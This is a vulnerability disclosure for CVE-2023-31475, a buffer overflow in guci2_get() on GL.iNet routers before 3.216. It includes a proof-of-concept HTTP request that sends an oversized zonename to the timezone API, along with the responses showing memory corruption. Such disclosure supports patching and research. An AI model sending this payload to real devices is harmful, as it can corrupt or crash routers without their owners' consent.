Headline
CVE-2023-31475: CVE-issues/Buffer_Overflow.md at main · gl-inet/CVE-issues
An issue was discovered on GL.iNet devices before 3.216. The function guci2_get() found in libglutil.so has a buffer overflow when an item is requested from a UCI context, and the value is pasted into a char pointer to a buffer without checking the size of the buffer.
======= REQUEST 1 =======
POST /api/router/timezone/set HTTP/1.1
Host: 192.168.8.1
Authorization: 80dafe40822e4a59b6daabd659617963
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
zonename=Asia/D[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa]
======= RESPONSE 1 =======
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 10
Connection: close
Date: Wed, 04 Jan 2023 00:29:13 GMT
Server: lighttpd/1.4.48
{"code":0}
======= REQUEST 2 =======
GET /api/router/timezone/get HTTP/1.1
Host: 192.168.8.1
Authorization: 80dafe40822e4a59b6daabd659617963
Connection: close
======= RESPONSE 2 =======
HTTP/1.1 200 OK
Content-Type: application/json
Expires: Wed, 04 Jan 2023 00:29:29 GMT
Cache-Control: max-age=1
Content-Length: 26750
Connection: close
Date: Wed, 04 Jan 2023 00:29:28 GMT
Server: lighttpd/1.4.48
{
"zonename":"Asia\/D[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEET-2EEST,M3.5.5\/0,M10.5.5\/0", // the extra value `EET-2EEST,M3.5.5/0,M10.5.5/0` is added to the end of zonename since the timezone value is copied to the middle of zonename, and no null byte is found until after the timezone value
"timezone":"EET-2EEST,M3.5.5\/0,M10.5.5\/0",
"autotimezone":true,
"systemtime":"Wed Jan 4 02:29:28 EET 2023",
"timezone_list":[{"zonename":"Africa\/Abidjan","timezone":"GMT0"},...],
"code":0
}